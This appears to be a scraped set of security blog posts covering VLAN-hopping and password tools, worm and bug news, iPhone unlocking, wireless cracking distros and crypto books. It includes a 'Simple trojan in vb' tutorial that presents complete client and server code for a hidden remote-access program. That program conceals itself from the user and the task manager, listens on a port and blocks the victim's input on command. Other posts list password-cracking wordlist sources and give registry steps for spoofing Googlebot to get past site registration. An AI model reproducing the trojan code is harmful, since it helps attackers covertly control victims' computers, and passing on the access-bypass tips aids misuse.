VoIP Hopper - VLAN Hopping Tool

VoIP Hopper is a GPLv3 licensed security tool, written in C, that rapidly runs a VLAN Hop into the Voice VLAN on specific Ethernet switches. VoIP Hopper does this by mimicking the behavior of an IP Phone, in both Cisco and Avaya IP Phone environments.

In Cisco IP Phone networks, it first dissects either IEEE 802.3 or Ethernet II for Cisco Discovery Protocol (CDP) packets. If CDP is enabled on the switch port and the Voice VLAN feature is enabled, it will determine the Voice VLAN ID (VVID).

This will allow the tool to create a new Ethernet interface on the PC that tags the 802.1q VLAN header in the Ethernet packet. After VoIP Hopper has created the new Ethernet device, it will send a DHCP client request.

In Avaya IP Phone environments, it sends an Option 55 parameter request list, requesting Option 176. When the DHCP server sends Option 176, it decodes the L2QVLAN reply field for the Voice VLAN ID. It then creates a new voice interface and sends a DHCP request.

Why?

VoIP Hopper was written with the specific aim of improving security in VoIP environments by validating Layer 2 protection controls. It is a VLAN test tool that can be used to validate controls in VoIP environments but also anywhere else VLANs are used (basically everywhere).

You can download VoIP Hopper here:

Worm Spreading Fast on Google’s Orkut Social Network

A new worm has hit Google’s Orkut and it seems to be hitting it pretty hard, it’s infected via the scrapbook feature and is adding hundreds of thousands of users, similar to the Myspace worm (Samy) that hit in October 2005.

It seems to be fairly unmalicious, more of a ‘look at me - see what I can do’ kind of thing. It’s certainly interested to see that social networking sites are beginning to be the focus of hackers, even if it’s not for money or stealing info..But more of a playground to test their skills.

A fast moving worm is squirming though Google’s Orkut social network, adding hundreds of thousands of users to an Orkut community created by a Brazilian hacker.

The worm, which first appeared on Dec. 19, has been spreading through Orkut’s Scrapbook system at a rapid pace, infecting more than 650,000 users in the space of a few hours.

According to an alert from anti-virus specialist Trend Micro, infection starts when an Orkut user is sent an e-mail telling them that they have a new Scrapbook entry.

I guess you can avoid it by not reading any scraps, or using something like NoScript - which would remove the danger of the JavaScript. But again it comes back to the same old thing, how many average users would even know what NoScript is?

Logging into Orkut, the victim is greeted with Portuguese-language text that reads: “2008 vem ai… que ele comece mto bem para vc.” This translates to “2008 is coming…I wish that it begins quite well for you”.

No interaction is necessary. Simply looking at the scrap starts the infection sequence,” says Trend Micro researcher Robert McArdle.

Once the scrap is viewed, it deletes itself and the victim is automatically added to the “Infectados pelo VĂrus do Orkut” community.

Once a user becomes infected, the infected account downloads and executes an embedded Javascript that sends a copy of the original Scrapbook post to all the victim’s contacts.

But yes indeed, it shows the danger of allowing rich user content sanitizing it properly. Haven’t they learned their lessons from what happened at MySpace?

Data Leakage Bug in Mozilla Firefox Confirmed

It seems a data leakage bug has struck Firefox recently and has been confirmed by Window Snyder the security bod at Mozilla.

It’s basically a Chrome directory traversal bug (It seems a lot of the Firefox issues have had to do with chrome?).

It’s rated as low risk, but it can give away the existence of files (if the attacker knows the name and location).

The bug resides in Firefox’s chrome protocol scheme and allows for a directory traversal when certain types of extensions are installed. Attackers could use it to detect if certain programs or files are present on a machine, gaining information to use in perpetrating another, more malicious exploit.

Normally, Firefox’s chrome package is restricted to a limited number of directories, but a bug in the way it handles escaped sequences (i.e. %2e%2e%2f) allows attackers to escape those confines and access more sensitive parts of a user’s computer. The exploit only works if a user has made use of Firefox extensions that are “flat,” this is, those that don’t package their files in a jar archive. Examples of flat add-ons include Download Statusbar and Greasemonkey.

You can protect yourself by using NoScript, which I would guess most of you guys are using already.

The open bug can be found here.

Multilingual Worm Spreads Over MSN Messenger

Another MSN worm spreading with the same tactics as usual, “Wanna see my pictures before i send em to facebook?” and so on.

The only really interesting thing about this worm is it sends the message in the language of the locale installed on the infected machine, this is pretty intelligent and is much more likely to work as most of the people on sometimes contact list are probably from the same country or at least use the same language.

The IRCBOT-RB Trojan poses as messages containing links to pictures on social networking sites such as MySpace and Facebook. Typical come-ons involve messages such as “Wanna see my pictures before i send em to facebook?”. Clicking on a link takes users to booby-trapped websites.

Unusually, the polyglot malware changes these messages according to the language of the affected operating system used. Compromised machines are infected by a simple bot agent that leaves the hardware hooked up to a central control server, awaiting instructions.

This would mean it’s much more believable than someone who speaks Portuguese to their friends sending a message in English. As usual please educate people not to blindly follow or click links and definitely don’t accept files sent by friends on MSN/Yahoo! or AIM as they are most likely auto-generated by a trojan.

Do message the person back manually and ask them if they really sent it.

Password Cracking Wordlists and Tools for Brute Forcing

I quite often get people asking me where to get Wordlists, after all brute forcing and password cracking often relies on the quality of your word list.

Do note there are also various tools to generate wordlists for brute forcing based on information gathered such as documents and web pages (such as Wyd - password profiling tool) These are useful resources that can add unique words that you might not have if your generic lists.

Also add all the company related words you can and if possible use industry specific word lists (chemical names for a lab, medical terms for a hospital etc).

And always brute force in the native language.

You can find a simple wordlist generator in PERL here.

Although old, one of the most complete wordlist sets is here (easily downloadable by FTP too):

Oxford Uni Wordlists

There’s a good set of lists here including many european languages and topic specific lists:

The Argon Wordlists

Here we have 50,000 words, common login/passwords and African words (this used to be a great resource):

Totse Word Lists

There’s a good French word list here with and without accents, also has some other languages including names:

Wordlists for bruteforce crackers

One of the most famous lists is still from Openwall (the home of John the Ripper) and now costs money for the full version:

Openwall Wordlists Collection

Some good lists here organized by topic:

Outpost9 Word lists

Packetstorm has some good topic based lists including sciences, religion, music, movies and common lists.

Password Hasher Firefox Extension

Well seen as though we were talking about breaking passwords, here’s a tool for Firefox to help you manage your more secure passwords.

Better security without bursting your brain

Password Hasher is a Firefox security extension for generating site-specific strong passwords from one (or a few) master key(s).

What good security practice demands:

      Strong passwords that are hard to guess.
      Different passwords at each site.
      Periodically changing existing passwords.

Why you probably aren’t practicing good security:

      Strong passwords are difficult to remember.
      Juggling a multitude of passwords is a pain.
      Updating passwords compounds the memorization problem.

How Password Hasher helps:

  • Strong passwords are automatically generated.
  • The same master key produces different passwords at many sites.
  • You can quickly upgrade passwords by “bumping” the site tag.
  • You can upgrade the master key without updating all sites at once.
  • It supports different length passwords.
  • It supports special requirements, such as digit and punctuation characters.
  • All data is saved to the browser’s secure password database.

You can download Password Hasher here:

Apple iPhone Unlocked Again - 1.1.2 and 1.1.3 Firmware

Once again Apple iPhone has been unlocked by a determined youngster, the same who was amongst the first to unlock it last year winning himself a rather nice car and a few 8gb iPhones. It just shows nothing is infallible, all he needed to find was a writable memory address and he

was pretty much done (he used a much higher range of registers than previously).

A teen hacker known for his deftness with iPhones has figured out how to unlock models running the latest firmware versions by cracking a protection that has frustrated hackers for weeks.

The breakthrough by George Hotz, aka Geohot, means people who have bought a recent iPhone will once again be able to use it on the phone network of their choice. Apple makes as much as $400 for every handset that’s activated on an approved network, so its developers have worked hard to prevent the so-called unlocking of iPhones.

A very smart young man indeed, just showing 1 person can indeed defeat the security of a huge multi-national billion dollar company.

And he’s done it twice.

The latest salvo was fired late last week, following a 24-hour hacking spree by Geohot that was broken up by only three hours of sleep. It turns out the latest firmware contained modifications to the device’s memory registers to prevent unlocking. Geohot worked around those changes by finding another, much higher register that was vulnerable.

“I guess Apple thought big numbers were harder to guess,” he wrote.

He then found a way to install his custom-built code by exploiting a flaw that allowed him to erase a range of memory addresses where security software is stored.

An amazing 27% of iPhones are running on unauthorized networks which means they are cracked. Of course Apple will soon come out with a new firmware update that negates this problem….but then the game will just start all over again.

And no one doubt Geohot or someone like him will break it again.

If you want to know how to do it check out step-by-step instructions here from iClarified here.

Russix - LiveCD Linux Distro for Wireless Penetration Testing & WEP Cracking

It looks like it might be time to update our very well received list of the 10 Best Security Live CD Distros (Pen-Test, Forensics & Recovery) since we have Russix now and Backtrack new version is on the way out.

Russix is a Slax based Wireless Live Linux. It has been designed to be light (circa 230Mb) and dedicated purely to wireless auditing.

It is not a script kiddy phishing tool and as such, while it will allow you to break a WEP key in 6 key strokes and conduct an “Evil Tiny Twin” attack in less than 5, it will not let you become the latest version of Barclays Bank.

Russix evolved from an internal UK Military Wireless auditing tool (debian based) which russ had developed while working for them as a penetration tester.

Russix is a free download for auditing. It scripts together several WLAN attacks and will allow the user to break a WEP key in about 6 keystrokes! It will not be modified by us to make it into a phishing tool as that would be evil.

It comprises a number of tools including aircrack-ng, cowpatty, asleap, nmap, wireshark, hydra, as well as scripted attacks to aid cracking WEP and WPA networks. Currently, it only supports Atheros based chipsets and those of you lucky enough to own 2 atheros cards will be able to use the scripted Evil Twin attack.

Interested in hearing any feedback you may have or improvements you can make.

laptop and data theft protection

A UK firm Virtuity has created data protection software called BackStopp which comes with ’self-destruct’ technology based on Wi-Fi and RFID tags that starts to run as and when a laptop is moved from its designated space.

So in layman’s terms, if the laptop is moved from its permitted zone (which is set by the user) Backstopp sends out a self-destruct message to block access and ultimately destroy data, locating the laptop using Wi-Fi and radio frequency identification technology. What’s even cooler is that any laptop featuring an in-built webcam will be prompted to start taking photographs to help identify the thief.

There are millions of people out there who keep very secure data on their laptops which, if fallen into the wrong hands can cause damage to a lot of people. This FBI/CIA type security tool brings advanced security to all laptops users at a very affordable price of £10 per laptop per month.

Simple trojan in vb

Simple trojan in vb

Writing a Trojan is a lot easier than most people think. All it really involves is two simple applications both with fewer than 100 lines of code. The first application is the client or the program that one user knows about. The second is the server or the actual “trojan” part. I will now go through what you need for both and some sample code.

Server
The server is the Trojan part of the program. You usually will want this to be as hidden as possible so the average user can’t find it. To do this you start by using

Code: VB

Private Sub Form_Load()
Me.Visible = False
End Sub
This little bit of code makes the program invisible to the naked eye. Now we all know that the task manager is a little bit peskier. So to get our application hidden from that a little better we make our code look like this.

Code: VB

Private Sub Form_Load()
Me.Visible = False
App.TaskVisible = False
End Sub
So now, we have a program that is virtually invisible to the average user, and it only took four lines of code. Now all of you are thinking that this tutorial sucks right about now so lets make it a lot better by adding functions to our Trojan!
The first thing we want to do is make it be able to listen for connections when it loads. So in order to do this we need to add a Winsock Control. I named my control win but you can name yours what ever.

Now to make it listen on port 2999 when the Trojan starts up we make our code look like this.
Code: VB

Private Sub Form_Load()
Me.Visible = False
App.TaskVisible = False
win.LocalPort = 2999
win.RemotePort = 455
win.Listen
End Sub
This code will set the local open port to 2999 and the port it sends it to is 455. So now, we have a program that listens but still doesn’t do anything neat. Lets make it block the input of the user completely when we tell it to!

To do this little devious thing we need to add a module with the following code

Public Declare Function BlockInput Lib "user32" (ByVal fBlock As Long) As Long

Then we add this code to our main form:

Code: VB

Private Sub win_ConnectionRequest(ByVal requestID As Long)
win.Close
win.Accept requestID
End Sub

Private Sub win_DataArrival(ByVal bytesTotal As Long)
win.GetData GotDat
DoActions (GotDat)
End Sub
The code in the module is called a windows API. It uses a dll file to do tasks that we want. Now this code still won’t block the users input but we are very close. We now need to program the DoActions function that we called on our main form. In case you were wondering the code that we added to the form does two different things. The first sub makes it so all connection requests are automatacly accepted. The second sub makes it so all data is automaticly accepted and it then passes all of the data to the function DoActions which we are about to code.

For the DoActions code, we want to make a public function in the module. So add this code to the module and we are about done with the server of the Trojan!

Code: VB

Public Function DoActions(x As String)
Dim Action
Select Case x
Case "block"
Action = BlockInput(True)
End Select
End Function
Ok now we have a program that when the data “block” is sent to it on port 2999 it will block the users input. I made a Select Case statement so it is easy to modify this code to your own needs later on. I recommend adding a unblock feature of your own. To do that just call the BlockInput function with the argument False instead of true.

Main Form
Code: VB

Private Sub Form_Load()
Me.Visible = False
App.TaskVisible = False
win.LocalPort = 2999
win.RemotePort = 455
win.Listen
End Sub

Private Sub win_ConnectionRequest(ByVal requestID As Long) ' As corrected by Darkness1337
win.Close
win.Accept requestID
End Sub

Private Sub win_DataArrival(ByVal bytesTotal As Long)
win.GetData GotDat
DoActions (GotDat)
End Sub
Remember to add your winsock control and name it to win if you use this code.

Code: VB

Module

Public Declare Function BlockInput Lib "user32" (ByVal fBlock As Long) As Long

Public Function DoActions(x As String)
Dim Action
Select Case x
Case "block"
Action = BlockInput(True)
End Select
End Function
That’s all there is to the server side or Trojan part of it. Now on to the Client.

Client

The client will be what you will interact with. You will use it to connect to the remote server (trojan) and send it commands. Since we made a server that accepts the command of “block” lets make a client that sends the command “block”.

Make a form and add a Winsock Control, a text box, and three buttons. The Text box should be named txtIP if you want it to work with this code. In addition, your buttons should be named cmdConnect, cmdBlockInput, and cmdDisconnect. Now lets look at the code we would use to make our Client.

Code: VB

Private Sub cmdConnect_Click()
IpAddy = txtIp.Text
Win.Close
Win.RemotePort = 2999
Win.RemoteHost = IpAddy
Win.LocalPort = 9999
Win.Connect
cmdConnect.Enabled = False
End Sub

Private Sub cmdDisconnect_Click()
Win.Close
cmdConnect.Enabled = True
End Sub

Private Sub cmdBlockInput_Click()
Win.SendData "block"
End Sub
That is the code for the client. All it does is gets the Ip Adress from txtIp and connects to it on remote port 2999. Then when connected you can send the “block” data to block off their input.

How To Access a Website That Allows Google But Not You

You surely dislike when you conduct a search on Google and the search engine returns a number of good results, but when you try to open the ones that looks the most interesting you get a registration page. The reason is that there are some websites that allow Google but not unregistered or you. The solution is to disguise yourself as Google changing your browser's identity (named user agent) to Googlebot.

Internet Explorer

Copy this code into notepad and save it as a .reg file (name it googlebot-useragent.reg for example) or download and un-zip this file

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
Internet Settings\5.0\User Agent]
@="Googlebot/2.1"
"Compatible"="+http://www.googlebot.com/bot.html"

Now double-click the .reg file you've created (or downloaded) to merge it into Windows registry. In order to restore the default user agent copy this code into notepad and save it as a .reg file (name it standard-useragent.reg for example) or download and un-zip this file

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
Internet Settings\5.0\User Agent]
@="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

Now double-click the .reg file you've created (or downloaded) in order to change back to the default user agent.

Firefox

Type in about:config in the address bar and down to find "general.useragent.extra.firefox".
Double click on it and type in "Googlebot 2.1".
This will change Firefox user agent to the google bot. To change the user agent back to the original click Reset to restore the property to its default value.

Opera

There is no way to change the user agent to Googlebot in Opera at the moment.

Cain & Abel v 4.9.8

Cain & Abel v 4.9.8

Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort. It covers some security aspects/weakness present in protocol's standards, authentication methods and caching mechanisms; its main purpose is the simplified recovery of passwords and credentials from various sources, however it also ships some "non standard" utilities for Microsoft Windows users.

Cain & Abel has been developed in the hope that it will be useful for network administrators, teachers, security consultants/professionals, forensic staff, security software vendors, professional penetration tester and everyone else that plans to use it for ethical reasons. The author will not help or support any illegal activity done with this program. Be warned that there is the possibility that you will cause damages and/or loss of data using this software and that in no events shall the author be liable for such damages or loss of data. Please carefully read the License Agreement included in the program before using it.

The latest version is faster and contains a lot of new features like APR (Arp Poison Routing) which enables sniffing on switched LANs and Man-in-the-Middle attacks. The sniffer in this version can also analyze encrypted protocols such as SSH-1 and HTTPS, and contains filters to capture credentials from a wide range of authentication mechanisms. The new version also ships routing protocols authentication monitors and routes extractors, dictionary and brute-force crackers for all common hashing algorithms and for several specific authentications, password/hash calculators, cryptanalysis attacks, password decoders and some not so common utilities related to network and system security.

Internet Security : Cryptographic Principles, Algorithms

Internet Security : Cryptographic Principles, Algorithms

Internet Security : Cryptographic Principles, Algorithms and Protocols

Knowledge of number theory and abstract algebra are pre-requisites for any engineer designing a secure internet-based system.

However, most of the books currently available on the subject are aimed at practitioners who just want to know how the various tools available on the market work and what level of security they impart. These books traditionally deal with the science and mathematics only in so far as they are necessary to understand how the tools work.
Internet Security differs by its assertion that cryptography is the single most important technology for securing the Internet. To quote one reviewer "if every one of your communication partners were using a secure system based on encryption, viruses, worms and hackers would have a very hard time". This scenario does not reflect the reality of the Internet world as it currently stands. However, with security issues becoming more and more important internationally, engineers of the future will be required to design tougher, safer systems.

Internet Security:

Offers an in-depth introduction to the relevant cryptographic principles, algorithms protocols - the nuts and bolts of creating a secure network

Links cryptographic principles to the technologies in use on the Internet, eg. PGP, S/MIME, IPsec, SSL TLS, Firewalls and SET (protecting credit card transactions)

Provides state-of-the-art analysis of the latest IETF standards plus summaries and explanations of RFC documents

Authored by a recognised expert in security
Internet Security is the definitive text for graduate students on security and cryptography courses, and researchers in security and cryptography areas. It will prove to be invaluable to professionals engaged in the long-term development of secure systems.
